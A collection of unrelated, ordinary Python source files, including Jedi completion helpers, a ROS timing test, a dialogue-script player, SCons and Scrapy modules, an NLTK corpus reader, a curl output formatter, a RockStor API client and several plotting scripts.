encoding='utf-8', re_raise=(jedi.NotFoundError,)) except jedi.NotFoundError: return [] if uses is None: return None result = [] for use in uses: if use.module_path == filename: offset = linecol_to_pos(source, use.line, use.column) elif use.module_path is not None: with open(use.module_path) as f: text = f.read() offset = linecol_to_pos(text, use.line, use.column) result.append({"name": use.name, "filename": use.module_path, "offset": offset}) return result # From the Jedi documentation: # # line is the current line you want to perform actions on (starting # with line #1 as the first line). column represents the current # column/indent of the cursor (starting with zero). source_path # should be the path of your file in the file system. def pos_to_linecol(text, pos): """Return a tuple of line and column for offset pos in text. Lines are one-based, columns zero-based. This is how Jedi wants it. Don't ask me why. """ line_start = text.rfind("\n", 0, pos) + 1 line = text.count("\n", 0, line_start) + 1 col = pos - line_start return line, col def linecol_to_pos(text, line, col): """Return the offset of this line and column in text. Lines are one-based, columns zero-based. This is how Jedi wants it. Don't ask me why. """ nth_newline_offset = 0 for i in range(line - 1): new_offset = text.find("\n", nth_newline_offset) if new_offset < 0: raise ValueError("Text does not have {0} lines." .format(line)) nth_newline_offset = new_offset + 1 offset = nth_newline_offset + col if offset > len(text): raise ValueError("Line {0} column {1} is not within the text" .format(line, col)) return offset def run_with_debug(jedi, name, *args, **kwargs): re_raise = kwargs.pop('re_raise', ()) # Remove form feed characters, they confuse Jedi (jedi#424) if 'source' in kwargs: kwargs['source'] = kwargs['source'].replace("\f", " ") try: script = jedi.Script(*args, **kwargs) return getattr(script, name)() except Exception as e: if isinstance(e, re_raise): raise # Bug jedi#417 if isinstance(e, TypeError) and str(e) == 'no dicts allowed': return None # Bug jedi#427 if isinstance(e, UnicodeDecodeError): return None # Bug jedi#429 if isinstance(e, IndexError): return None # Bug jedi#431 if isinstance(e, AttributeError) and str(e).endswith("'end_pos'"): return None # Bug in Python 2.6, see #275 if isinstance(e, OSError) and e.errno == 13: return None # Bug jedi#466 if ( isinstance(e, SyntaxError) and "EOL while scanning string literal" in str(e) ): return None # Bug jedi#482 if isinstance(e, UnicodeEncodeError): return None # Bug jedi#485 if ( isinstance(e, ValueError) and "invalid \\x escape" in str(e) ): return None # Bug jedi#485 in Python 3 if ( isinstance(e, SyntaxError) and "truncated \\xXX escape" in str(e) ): return None # Bug jedi#465 if ( isinstance(e, SyntaxError) and "encoding declaration in Unicode string" in str(e) ): return None # Bug #337 / jedi#471 if ( isinstance(e, ImportError) and "No module named" in str(e) ): return None # Bug #365 / jedi#486 - fixed in Jedi 0.8.2 if ( isinstance(e, UnboundLocalError) and "local variable 'path' referenced before assignment" in str(e) ): return None # Bug #366 / jedi#491 if ( isinstance(e, ValueError) and "__loader__ is None" in str(e) ): return None # Bug #353 if ( isinstance(e, OSError) and "No such file or directory" in str(e) ): return None from jedi import debug debug_info = [] def _debug(level, str_out): if level == debug.NOTICE: prefix = "[N]" elif level == debug.WARNING: prefix = "[W]" else: prefix = "[?]" debug_info.append(u"{0} {1}".format(prefix, str_out)) jedi.set_debug_function(_debug, speed=False) try: script = jedi.Script(*args, **kwargs) return getattr(script, name)() except Exception as e: source = kwargs.get('source') sc_args = [] sc_args.extend(repr(arg) for arg in args) sc_args.extend("{0}={1}".format(k, "source" if k == "source" else repr(v)) for (k, v) in kwargs.items()) data = { "traceback": traceback.format_exc(), "jedi_debug_info": {'script_args': ", ".join(sc_args), 'source': source, 'method': name, 'debug_info': debug_info} } raise rpc.Fault(message=str(e), code=500, data=data) finally: jedi.set_debug_function(None)
#!/usr/bin/env python """Rostopic time opening test module. This is a standalone script. In your ros_ws workspace, run: rosrun cs473_baxter rostopic_test.py -f [FILE] -s [SECONDS] The seconds that worked on our workstation was 0.3. We opened up the file that contained the data from executing the command and we either got one time interval of data or no data at all for n=10 trials. """ import time import argparse import subprocess import rospy def main(): arg_fmt = argparse.RawDescriptionHelpFormatter parser = argparse.ArgumentParser(formatter_class=arg_fmt, description=main.__doc__) parser.add_argument( '-f', '--file', dest='filename', required=True, help="the file to save to and the path to that file" ) parser.add_argument( '-s', '--seconds', dest='seconds', required=True, help="how long to sleep" ) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node("rostopic_time_test") r_time = rospy.Time() r_data = open(args.filename, 'a+') print 'start: ' + str(r_time.now().secs) + "." + str(r_time.now().nsecs) r_proc = subprocess.Popen(['rostopic', 'echo', '/robot/limb/right/endpoint_state'], stdout=r_data) time.sleep(float(args.seconds)) r_proc.terminate() print 'end: ' + str(r_time.now().secs) + "." + str(r_time.now().nsecs) r_data.close() if __name__ == '__main__': main()
import re import colorama class Color(object): @staticmethod def green(txt): return colorama.Fore.GREEN + txt + colorama.Fore.RESET @staticmethod def red(txt): return colorama.Fore.RED + txt + colorama.Fore.RESET @staticmethod def blue(txt): return colorama.Fore.BLUE + txt + colorama.Fore.RESET @staticmethod def dim(txt): return colorama.Style.DIM + txt + colorama.Fore.RESET def line_number_generator(): x = 1 while True: yield x x += 1 class ReconSyntaxError(Exception): pass class ReconReader(object): @staticmethod def get_lines(inp): return ReconReader.concatenate_continuations(ReconReader.translate(inp)) @staticmethod def translate(lines): """Returns an list of Line objects for every line in the input list""" g = line_number_generator() return [Line(line, g.next()) for line in lines] @staticmethod def concatenate_continuations(lines): """Scans the input list for continuation lines, and prepends their content to the OUT or IN line that preceded them. Raises a ReconSyntaxError if the preceding line is not an OUT or IN.""" outlines = [] lastline = None for line in lines: if line.type is LineType.CONTINUATION: if lastline is None: raise ReconSyntaxError("Line %d: The line is a CONTINUATION, but there's nothing to continue from." % line.number) if lastline.type not in [LineType.IN, LineType.OUT]: raise ReconSyntaxError("Line %d: Line is a CONTINUATION but the last non-continuation line is not OUT or IN." % line.number) lastline.content += "\n" + line.content else: lastline = line outlines.append(line) return outlines class LineType(object): OUT = 1 IN = 2 BOOKMARK = 3 JUMP = 4 CONTINUATION = 5 QUIT = 6 @staticmethod def to_string(linetype): if linetype is LineType.OUT: return "OUT" if linetype is LineType.IN: return " IN" if linetype is LineType.BOOKMARK: return "BMK" if linetype is LineType.JUMP: return "JMP" if linetype is LineType.QUIT: return "BYE" if linetype is LineType.CONTINUATION: return "..." return "???" class Line(object): in_pattern = re.compile(r"^([0-9]+|\-+)\> ") def __init__(self, line, number): self.source = line self.number = number self.type = Line.detect_linetype(line) self.indentation = 0 self.content = line.strip() if self.type is not LineType.CONTINUATION: self.indentation = Line.detect_indentation(line) self.content = line.strip()[3:] def __str__(self): return "%3d %s %s %s" % (self.number, LineType.to_string(self.type), self.indentation, self.content.replace("\n", "\n ")) @staticmethod def detect_indentation(line): # Count the number of spaces at the start of the line. spaces = 0 while spaces < len(line) and line[spaces] == " ": spaces += 1 return spaces / 2 @staticmethod def detect_linetype(line): stripped_line = line.strip() if stripped_line.startswith("<- "): return LineType.OUT if stripped_line.startswith("!B "): return LineType.BOOKMARK if stripped_line.startswith("!J "): return LineType.JUMP if stripped_line.startswith("!Q"): return LineType.QUIT if Line.in_pattern.match(stripped_line): return LineType.IN # If we couldn't detect a line type the line must # be a paragraph continuation. return LineType.CONTINUATION class ReconPlayer(object): def __init__(self, lines): self.lines = lines self.cursor = 0 def log(self, msg): print Color.red("# " + msg) def play(self, continuous=True, cursor=0, choice=None): self.cursor = cursor response = { "action": "input", "out": "", "in": [], "cursor": 0 } while True: if self.cursor >= len(self.lines): self.log("Reached end of script - exiting.") break line = self.current_line() if line.type is LineType.JUMP: self.log("Jumping to " + line.content) self.move_cursor_to_bookmark(line.content) if line.type is LineType.OUT: self.log("Speech") print line.content, "\n" response["out"] += line.content + "\n"; if line.type is LineType.IN: self.log("Conversation choice") in_lines = self.get_in_lines() # Print the options. response["in"] = [] option_number = 0 for line in in_lines: option_number += 1 print "%s %s" % (Color.green(str(option_number) + ":"), line.content) response["in"].append(line.content) # Get input. if continuous: option_chosen = self.get_choice(option_number) - 1 elif choice is not None: # Use the choice given when the function was called option_chosen = choice # Now the choice has been made, erase it so it doesn't get reused. choice = None else: # Because play is non-continuous, return the available choices. # The caller will call play again when a choice has been made. response["cursor"] = self.cursor return response # Move the cursor to whichever line was chosen. chosen_line = in_lines[option_chosen] self.move_cursor_to_line(chosen_line) print if line.type is LineType.QUIT: self.log("Quit") break if line.type is LineType.BOOKMARK: self.log("Bookmark " + line.content + " skipped") self.cursor += 1 response["action"] = "stop" response["in"] = [] return response def move_cursor_forward(self): self.cursor += 1 def move_cursor_to_line(self, line): self.cursor = self.lines.index(line) def move_cursor_to_bookmark(self, name): for line in self.lines: if line.type is LineType.BOOKMARK and line.content == name: self.move_cursor_to_line(line) return self.log("Couldn't find bookmark " + name) def current_line(self): return self.lines[self.cursor] def get_in_lines(self): """Returns a list of all IN lines that belong to the same set as the IN line that the cursor is on.""" indentation = self.current_line().indentation in_lines = [] for line in self.lines[self.cursor:]: if line.indentation < indentation: # A dedent implies that the IN group has ended. break if line.indentation > indentation: # An indent implies that this line is a child of # a previous IN line. continue if line.type is LineType.IN: # Match! in_lines.append(line) else: # This line is on the same indentation level # but is not an IN line, which implies that the # group has ended. break return in_lines def get_choice(self, max_number): while True: print ("Choose an option between 1 and %d:" % max_number), inp = raw_input() try: inp_int = int(inp) except ValueError: print "That's not a number!" else: if inp_int > 0 and inp_int <= max_number: return inp_int print "That number isn't one of the available choices." def strip_out(line): """Returns a string without the OUT token on the front, if the string has one.""" if line.startswith("<-"): return line[3:] return line def get_player(path): with open(path) as f: source = f.readlines() lines = ReconReader.get_lines(source) return ReconPlayer(lines) def show_lines(): with open("recon/test.recon") as f: source = f.readlines() lines = ReconReader.translate(source) lines = ReconReader.concatenate_continuations(lines) print "" print "DUMP" print "====" print for line in lines: print line def play(script_name): colorama.init() get_player("recon/%s.recon" % script_name).play()
"""SCons.Tool.nasm Tool-specific initialization for nasm, the famous Netwide Assembler. There normally shouldn't be any need to import this module directly. It will usually be imported through the generic SCons.Tool.Tool() selection method. """ # # Copyright (c) 2001 - 2014 The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # __revision__ = "src/engine/SCons/Tool/nasm.py 2014/09/27 12:51:43 garyo" import SCons.Defaults import SCons.Tool import SCons.Util ASSuffixes = ['.s', '.asm', '.ASM'] ASPPSuffixes = ['.spp', '.SPP', '.sx'] if SCons.Util.case_sensitive_suffixes('.s', '.S'): ASPPSuffixes.extend(['.S']) else: ASSuffixes.extend(['.S']) def generate(env): """Add Builders and construction variables for nasm to an Environment.""" static_obj, shared_obj = SCons.Tool.createObjBuilders(env) for suffix in ASSuffixes: static_obj.add_action(suffix, SCons.Defaults.ASAction) static_obj.add_emitter(suffix, SCons.Defaults.StaticObjectEmitter) for suffix in ASPPSuffixes: static_obj.add_action(suffix, SCons.Defaults.ASPPAction) static_obj.add_emitter(suffix, SCons.Defaults.StaticObjectEmitter) env['AS'] = 'nasm' env['ASFLAGS'] = SCons.Util.CLVar('') env['ASPPFLAGS'] = '$ASFLAGS' env['ASCOM'] = '$AS $ASFLAGS -o $TARGET $SOURCES' env['ASPPCOM'] = '$CC $ASPPFLAGS $CPPFLAGS $_CPPDEFFLAGS $_CPPINCFLAGS -c -o $TARGET $SOURCES' def exists(env): return env.Detect('nasm') # Local Variables: # tab-width:4 # indent-tabs-mode:nil # End: # vim: set expandtab tabstop=4 shiftwidth=4:
""" Scrapy Shell See documentation in docs/topics/shell.rst """ from threading import Thread from scrapy.commands import ScrapyCommand from scrapy.shell import Shell from scrapy.http import Request from scrapy.utils.spider import spidercls_for_request, DefaultSpider class Command(ScrapyCommand): requires_project = False default_settings = {'KEEP_ALIVE': True, 'LOGSTATS_INTERVAL': 0} def syntax(self): return "[url|file]" def short_desc(self): return "Interactive scraping console" def long_desc(self): return "Interactive console for scraping the given url" def add_options(self, parser): ScrapyCommand.add_options(self, parser) parser.add_option("-c", dest="code", help="evaluate the code in the shell, print the result and exit") parser.add_option("--spider", dest="spider", help="use this spider") def update_vars(self, vars): """You can use this function to update the Scrapy objects that will be available in the shell """ pass def run(self, args, opts): url = args[0] if args else None spider_loader = self.crawler_process.spider_loader spidercls = DefaultSpider if opts.spider: spidercls = spider_loader.load(opts.spider) elif url: spidercls = spidercls_for_request(spider_loader, Request(url), spidercls, log_multiple=True) # The crawler is created this way since the Shell manually handles the # crawling engine, so the set up in the crawl method won't work crawler = self.crawler_process._create_crawler(spidercls) # The Shell class needs a persistent engine in the crawler crawler.engine = crawler._create_engine() crawler.engine.start() self._start_crawler_thread() shell = Shell(crawler, update_vars=self.update_vars, code=opts.code) shell.start(url=url) def _start_crawler_thread(self): t = Thread(target=self.crawler_process.start, kwargs={'stop_after_crawl': False}) t.daemon = True t.start()
import os import sys import numpy as np from matplotlib import pyplot as plt from tools import data class ImageND(object): SENSOR = None def __init__(self, filename, dimensions=3): if dimensions < 3: print "The image doesn't have the minimum of 3 dimensions" sys.exit(1) self.dimensions = dimensions self.filename = filename self.filepath = os.path.join(data.DATA_DIR, self.filename) self.title = filename[2:15] def __validate(self, image): """ Validate image, check that's n-'dimensions' channel image """ if image is not None and len(image.shape) >= self.dimensions: return True return False def image(self): """ Returns the raw ndarray image :rtype: ndarray """ image = data.mat_file(self.filepath).get(self.SENSOR) if not self.__validate(image): print "Invalid dimensions or sensor {0} isn't in the image".format( self.sensor) sys.exit(1) return np.dstack(image) def nan_percentage(self): nan_count = np.count_nonzero(~np.isnan(self.image())) return (nan_count / self.image().size) * 100 def date(self): return data.parse_date(self.filename) def show(self, colorbar=True): plt.imshow(self.image()) plt.title(self.filename) if colorbar: plt.colorbar() plt.show() # ===================================== # Analysis # ===================================== def rgb(self): """ Return 3-tuple with (r, g, b) """ red = self.channel("red") green = self.channel("green") blue = self.channel("blue") return (red, green, blue) def channel(self, channel=None): """ This function is to be overwritten in by subclass """ return None class IbandImage(ImageND): SENSOR = "ibands" def channel(self, channel=None): """ Returns a specific channel, the options are: - red, green, blue :params: :params channel: string with the specified channel :rType: ndarray """ if channel == 'red': return self.image()[:, :, 0] elif channel == 'green': return self.image()[:, :, 1] elif channel == 'blue': return self.image()[:, :, 2] else: print "Channel requested wasn't red, green or blue" class MbandImage(ImageND): SENSOR = "mbands" def channel(self, channel=None): """ Returns a specific channel, the options are: - red - blue :params: :params channel: string with the specified channel :rType: ndarray """ channel = channel.strip().lower() if channel == 'red': return self.image()[:, :, 2] elif channel == 'green': return self.image()[:, :, 1] elif channel == 'blue': return self.image()[:, :, 0] else: print "Channel requested wasn't red, green or blue" class FcImage(ImageND): SENSOR = "fc" def channel(self, channel=None): """ Returns a specific channel, the options are: - red - blue :params: :params channel: string with the specified channel :rType: ndarray """ channel = channel.strip().lower() if channel == 'red': return self.image()[:, :, 0] elif channel == 'green': return self.image()[:, :, 1] elif channel == 'blue': return self.image()[:, :, 2] else: print "Channel requested wasn't red, green or blue"
# Natural Language Toolkit: Gutenberg Corpus Reader # # Copyright (C) 2001-2006 University of Pennsylvania # Author: Steven Bird <[email protected]> # Edward Loper <[email protected]> # URL: <http://nltk.sf.net> # For license information, see LICENSE.TXT """ Read tokens from the NLTK Gutenberg Corpus. Project Gutenberg -- http://gutenberg.net/ This corpus contains selected texts from Project Gutenberg: * Jane Austen (3) * William Blake (2) * G. K. Chesterton (3) * King James Bible * John Milton * William Shakespeare (3) * Walt Whitman """ from en.parser.nltk_lite.corpora import get_basedir from en.parser.nltk_lite import tokenize import os, re items = [ 'austen-emma', 'austen-persuasion', 'austen-sense', 'bible-kjv', 'blake-poems', 'blake-songs', 'chesterton-ball', 'chesterton-brown', 'chesterton-thursday', 'milton-paradise', 'shakespeare-caesar', 'shakespeare-hamlet', 'shakespeare-macbeth', 'whitman-leaves' ] item_name = { 'austen-emma': 'Jane Austen: Emma', 'austen-persuasion': 'Jane Austen: Persuasion', 'austen-sense': 'Jane Austen: Sense and Sensibility', 'bible-kjv': 'King James Bible', 'blake-poems': 'William Blake: Poems', 'blake-songs': 'Willian Blake: Songs of Innocence and Experience', 'chesterton-ball': 'G.K. Chesterton: The Ball and The Cross', 'chesterton-brown': 'G.K. Chesterton: The Wisdom of Father Brown', 'chesterton-thursday': 'G.K. Chesterton: The Man Who Was Thursday', 'milton-paradise': 'John Milton: Paradise Lost', 'shakespeare-caesar': 'William Shakespeare: Julius Caesar', 'shakespeare-hamlet': 'William Shakespeare: Hamlet', 'shakespeare-macbeth': 'William Shakespeare: Macbeth', 'whitman-leaves': 'Walt Whitman: Leaves of Grass', } def raw(files = items): if type(files) is str: files = (files,) for file in files: path = os.path.join(get_basedir(), "gutenberg", file + ".txt") f = open(path) preamble = True for line in f.readlines(): if not preamble: for t in tokenize.wordpunct(line): yield t if line[:5] == '*END*': preamble = False def demo(): from en.parser.nltk_lite.corpora import gutenberg from itertools import islice for word in islice(gutenberg.raw('bible-kjv'), 0, 100): print word, if __name__ == '__main__': demo()
from .exceptions import CURLResponseFormatterException from .colors import ( print_red, print_green, print_yellow, print_blue, ) from .pygments_formatter import PygmentsFormatter class CURLResponseFormatter(object): ''' Formats a CURL response to be nicer to read. ''' def __init__(self, readable=None, buf=None, color_headers=False, lexer=None, formatter=None, strip_headers=False, color_body=True): if readable is not None and buf is not None: raise Exception('only pass a readable or a buf, not both') self._color_body = color_body self._readable = readable self._buf = buf self._color_headers = color_headers self._lexer = lexer self._formatter = formatter self._mimetype = None self._strip_headers = strip_headers self._headers = [] def _set_buf(self): if self._readable is not None: if isinstance(self._readable, str): # it is a file name and we should open it try: with open(self._readable, 'rb') as f: self._buf = f.read() except IOError: raise CURLResponseFormatterException( 'passed a string `%s` that wasn\'t a readable file' % self._readable ) else: # some other readable object try: self._buf = self._readable.read() except AttributeError as e: print(e) raise CURLResponseFormatterException( 'passed a nonreadble nonfilename as readable' ) if hasattr(self._readable, 'close'): self._readable.close() elif self._buf is None: raise CURLResponseFormatterException('no readable or buf set') if isinstance(self._buf, bytes): self._buf = self._buf.decode('utf-8') def _parse_body(self): formatter = PygmentsFormatter( lexer_alias=self._lexer, mimetype=self._mimetype, formatter=self._formatter ) self._buf = formatter.format_buf(self._buf, color=self._color_body) def _parse(self): self._set_buf() while self._buf.startswith('HTTP'): # Search for both of these... since some responses seem to be # a little strange. end1 = self._buf.find('\r\n\r\n') end2 = self._buf.find('\n\n') # If we found an \r\n\r\n before a \n\n use that if end1 != -1: end = end1 inc = 4 else: end = end2 inc = 2 # this is an -i flag response self._headers.append(Header(self._buf[:end])) self._buf = self._buf[end+inc:] if len(self._headers) >= 1: self._mimetype = self._headers[-1].mimetype self._parse_body() def pretty_print(self): self._parse() if not self._strip_headers: for header in self._headers: header.pretty_print(colored=self._color_headers) print('\n') print(self._buf) class Header(object): def __init__(self, buf): # We either have to split on \r\n or \n headers = [h.strip() for h in buf.split('\r\n') if h.strip() != ""] if len(headers) == 1: headers = [h.strip() for h in buf.split('\n')] # first index is the HTTP/VERSION CODE MSG line self._http_line = headers.pop(0) self._headers = headers self.mimetype = None # find the content type if it is there for h in headers: if h.lower().startswith('content-type:'): self.mimetype = h.lower().split(':', 1)[1].strip() if ';' in self.mimetype: self.mimetype = self.mimetype.split(';', 1)[0] def pretty_print(self, colored=True): if colored: code = self._http_line.split(' ', 2)[1].strip() if code.startswith('5') or code.startswith('4'): print_red(self._http_line) elif code.startswith('2'): print_green(self._http_line) elif code.startswith('3'): print_yellow(self._http_line) else: print(self._http_line) for entry in self._headers: entry = entry.split(':', 1) print_blue(entry[0], end=': ') print(entry[1].strip()) else: print(self._http_line) for entry in self._headers: print(entry)
# Copyright (C) 2004-2008 Paul Cochrane # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. """ Example of plotting multiple curves with pyvisi """ import sys numArgs = len(sys.argv) if numArgs == 1: ren_mod = "vtk" else: ren_mod = sys.argv[1] # set up some data to plot from numpy import * x = arange(0, 2*pi, 0.1, dtype=floating) y1 = sin(x) y2 = cos(x) y3 = cos(x)**2 # example code for how a user would write a script in pyvisi from pyvisi import * # base level visualisation stuff # import the objects to render the scene using the specific renderer if ren_mod == "gnuplot": from pyvisi.renderers.gnuplot import * # gnuplot elif ren_mod == "vtk": from pyvisi.renderers.vtk import * # vtk elif ren_mod == "plplot": from pyvisi.renderers.plplot import * # plplot else: raise ValueError, "Unknown renderer module" # define the scene object # a Scene is a container for all of the kinds of things you want to put # into your plot for instance, images, meshes, arrow/vector/quiver plots, # contour plots, spheres etc. scene = Scene() # create a LinePlot object plot = LinePlot(scene) # add some helpful info to the plot plot.title = 'Example 2D plot' plot.xlabel = 'x' plot.ylabel = 'y' plot.linestyle = 'lines' # assign some data to the plot plot.setData(x, y1, y2, y3) # render the scene to screen scene.render(pause=True,interactive=True) # save the scene to file scene.save(fname="multiCurveLinePlot.png", format=PngImage()) # vim: expandtab shiftwidth=4:
""" Copyright (c) 2012-2013 RockStor, Inc. <http://rockstor.com> This file is part of RockStor. RockStor is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. RockStor is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ import os import requests import time import json import base64 import settings from storageadmin.exceptions import RockStorAPIException from functools import wraps from base_console import BaseConsole from storageadmin.models import OauthApp from django.conf import settings API_TOKEN = None def set_token(client_id=None, client_secret=None, url=None, logger=None): if (client_id is None or client_secret is None or url is None): os.environ['DJANGO_SETTINGS_MODULE'] = 'settings' app = OauthApp.objects.get(name=settings.OAUTH_INTERNAL_APP) client_id = app.client_id() client_secret = app.client_secret() url = 'https://localhost' token_request_data = { 'grant_type': 'client_credentials', 'client_id': client_id, 'client_secret': client_secret, } user_pass = '{0}:{1}'.format(client_id, client_secret) auth_string = base64.b64encode(user_pass.encode('utf-8')) auth_headers = {'HTTP_AUTHORIZATION': 'Basic ' + auth_string.decode("utf-8"), } response = requests.post('%s/o/token/' % url, data=token_request_data, headers=auth_headers, verify=False) try: content = json.loads(response.content.decode("utf-8")) global API_TOKEN API_TOKEN = content['access_token'] return API_TOKEN except Exception, e: if (logger is not None): logger.exception(e) msg = ('Exception while setting access_token for url(%s). Make sure ' 'credentials are correct: %s' % (url, e.__str__())) raise Exception(msg) def api_error(console_func): @wraps(console_func) def arg_wrapper(a1, a2): try: return console_func(a1, a2) except RockStorAPIException, e: print ('Operation failed due to the following error returned ' 'from the server:') print ('-----------------------------------------') print e.detail print ('-----------------------------------------') return -1 return arg_wrapper def api_call(url, data=None, calltype='get', headers=None, save_error=True): if (API_TOKEN is None): set_token() api_auth_header = {'Authorization': 'Bearer ' + API_TOKEN, } call = getattr(requests, calltype) try: if (headers is not None): headers.update(api_auth_header) if (headers['content-type'] == 'application/json'): r = call(url, verify=False, data=json.dumps(data), headers=headers) else: r = call(url, verify=False, data=data, headers=headers) else: r = call(url, verify=False, headers=api_auth_header, data=data) except requests.exceptions.ConnectionError: print('Error connecting to Rockstor. Is it running?') return {} if (r.status_code == 404): msg = ('Invalid api end point: %s' % url) raise RockStorAPIException(detail=msg) if (r.status_code != 200): try: error_d = json.loads(r.text) if (settings.DEBUG is True and save_error is True): cur_time = str(int(time.time())) err_file = '/tmp/err-%s.html' % cur_time with open(err_file, 'w') as efo: for line in r.text.split('\n'): efo.write('%s\n' % line) print('Error detail is saved at %s' % err_file) if ('detail' in error_d): if (error_d['detail'] == 'Authentication credentials were not provided.'): set_token() return api_call(url, data=data, calltype=calltype, headers=headers, save_error=save_error) raise RockStorAPIException(detail=error_d['detail']) except ValueError: raise RockStorAPIException(detail='Internal Server Error') r.raise_for_status() try: ret_val = r.json() except ValueError: ret_val = {} return ret_val def print_pools_info(pools_info): if (pools_info is None or not isinstance(pools_info, dict) or len(pools_info) == 0): print('There are no pools on the appliance.') return try: if ('count' not in pools_info): pools_info = [pools_info] else: pools_info = pools_info['results'] print("%(c)sPools on the appliance\n%(e)s" % BaseConsole.c_params) print("Name\tSize\tFree\tReclaimable\tRaid") for p in pools_info: print_pool_info(p) except Exception, e: print('Error displaying pool info') def print_pool_info(p, header=False): try: if header: print "%(c)sPool info%(e)s\n" % BaseConsole.c_params print("Name\tSize\tFree\tReclaimable\tRaid") p['size'] = sizeof_fmt(p['size']) p['free'] = sizeof_fmt(p['free']) p['reclaimable'] = sizeof_fmt(p['reclaimable']) print('%s%s%s\t%s\t%s\t%s\t%s' % (BaseConsole.c, p['name'], BaseConsole.e, p['size'], p['free'], p['reclaimable'], p['raid'])) except Exception, e: print e print('Error displaying pool info') def print_scrub_status(pool_name, scrub_info): try: print '%sScrub status for %s%s' % (BaseConsole.c, pool_name, BaseConsole.e) kb_scrubbed = None if ('kb_scrubbed' in scrub_info): kb_scrubbed = scrub_info['kb_scrubbed'] status = scrub_info['status'] print '%sStatus%s: %s' % (BaseConsole.c, BaseConsole.e, status) if (status == 'finished'): print '%sKB Scrubbed%s: %s' % (BaseConsole.c, BaseConsole.e, kb_scrubbed) except Exception, e: print e print('Error displaying scrub status') def print_shares_info(shares): if (shares is None or not isinstance(shares, dict) or len(shares) == 0): print('There are no shares in the system') return try: if ('count' not in shares): shares = [shares] else: shares = shares['results'] print("%(c)sShares on the appliance%(e)s\n" % BaseConsole.c_params) print("Name\tSize(KB)\tUsage(KB)\tPool") for s in shares: print_share_info(s) except Exception, e: print e print('Error displaying share info') def print_share_info(s, header=False): try: if header: print "%(c)sShare info%(e)s\n" % BaseConsole.c_params print("Name\tSize(KB)\tUsage(KB)\tPool") print('%s\t%s\t%s\t%s' % (s['name'], s['size'], s['r_usage'], s['pool']['name'])) except Exception, e: print e print('Error displaying share info') def print_disks_info(disks_info): if (disks_info is None or not isinstance(disks_info, dict) or len(disks_info) == 0): print('There are no disks on the appliance.') return try: if ('results' not in disks_info): # POST is used, don't do anything disks_info = disks_info elif ('count' not in disks_info): disks_info = [disks_info] else: disks_info = disks_info['results'] print("%sDisks on this Rockstor appliance%s\n" % (BaseConsole.u, BaseConsole.e)) print("Name\tSize\tPool") for d in disks_info: print_disk_info(d) except Exception, e: print('Error displaying disk info') def print_disk_info(d, header=False): try: if header: print "%(u)sDisk info%(e)s\n" % BaseConsole.c_params print("Name\tSize\tPool") d['size'] = sizeof_fmt(d['size']) print('%s%s%s\t%s\t%s' % (BaseConsole.c, d['name'], BaseConsole.e, d['size'], d['pool_name'])) except Exception, e: print e print('Error displaying disk info') def print_export_info(export_info): if (export_info is None or not isinstance(export_info, dict) or len(export_info) == 0): print('%(c)sThere are no exports for this share%(e)s' % BaseConsole.c_params) return try: if ('count' not in export_info): export_info = [export_info] else: export_info = export_info['results'] if (len(export_info) == 0): print('%(c)sThere are no exports for this share%(e)s' % BaseConsole.c_params) else: print ("%(c)sList of exports for this share%(e)s" % BaseConsole.c_params) print("Id\tMount\tClient\tWritable\tSyncable\tEnabled") for e in export_info: print('%s\t%s\t%s\t%s\t%s\t%s' % (e['id'], e['exports'][0]['mount'], e['host_str'], e['editable'], e['syncable'], e['enabled'])) except Exception, e: print e print('Error displaying nfs export information') def sizeof_fmt(num): for x in ['K', 'M', 'G', 'T', 'P', 'E']: if (num < 0.00): num = 0 break if (num < 1024.00): break else: num /= 1024.00 x = 'Z' return ("%3.2f%s" % (num, x))
#%matplotlib inline import sys import pandas as pd import numpy as np import pandas as pd import matplotlib.pyplot as plt print sys.argv if len(sys.argv) > 1: df = pd.read_csv(sys.argv[1]) else: df = pd.read_csv("MAPT_ExACScores.csv") high_frequency = df[df["ALLELE FREQUENCY"]>0.05] x = list(high_frequency["AA_POS"]) y = list(high_frequency["ALLELE FREQUENCY"]) mutation = list(high_frequency["MUTATION"]) x_dup = [x[0]] y_dup = [y[0]] mutation_dup = [mutation[0]] for aa in range(1, len(x)): if x[aa] == x[aa-1]: mutation_dup[-1] = mutation_dup[-1] + ', ' + mutation[aa] else: x_dup.append(x[aa]) y_dup.append(y[aa]) mutation_dup.append(mutation[aa]) fig = plt.figure() ax = fig.add_subplot(111) x = list(df.AA_POS) y = list(df["ALLELE FREQUENCY"]) plt.plot(x, y) plt.axhline(y=0.05, color='r') for i in range(len(x_dup)): ax.annotate(mutation_dup[i], xy=[x_dup[i],y_dup[i]], textcoords='data', rotation=70) plt.grid() plt.savefig('variant_plot.tiff') #plt.show()
